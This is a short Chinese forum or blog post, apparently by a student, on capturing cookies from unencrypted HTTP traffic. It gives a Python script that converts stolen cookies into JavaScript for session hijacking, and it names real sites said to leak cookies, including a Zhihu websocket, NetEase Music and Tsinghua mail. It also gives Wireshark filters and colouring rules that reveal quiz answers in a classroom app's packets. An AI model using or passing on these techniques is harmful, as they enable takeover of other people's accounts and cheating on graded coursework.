写了个脚本利用抓到的cookie。
大概长这样:

1
2
3
4
5
6
7
8
9
10
def cookie_to_js(s):
res = ''
a=s.split(';')
for x in a:
if '=' in x:
res+='document.cookie="%s";'%(x)

return res

print(cookie_to_js('a=b;c=d;'))

有其他好用的工具的话就见笑了,求推荐。

http://apilive.zhihu.com/apilive 这个websocket好像会被客户端访问,没有用https,可以抓到cookie。

http://music.163.com/ 这个也是。

http://mail.tsinghua.edu.cn/ 也是。

learn以及info没有成功。

(感觉我需要一个浏览器插件,禁止所有的带cookie的http出流量。

另外雨$课堂:

1
http and http.request.uri contains "answer_lesson_problem"

这个规则可以过滤出答题的包。

配合下面的染色规则可以直观得到每个包的答案。

1
2
3
4
@D@tcp contains "\"result\":\"D\""@[65535,65535,65535][65535,32896,0]
@C@tcp contains "\"result\":\"C\""@[65535,65535,65535][32896,0,32896]
@B@tcp contains "\"result\":\"B\""@[65535,65535,65535][65535,0,0]
@A@tcp contains "\"result\":\"A\""@[65535,65535,65535][0,0,65535]

另外,想用python实时处理抓到的流应该用什么库啊?(pypcap好像不行)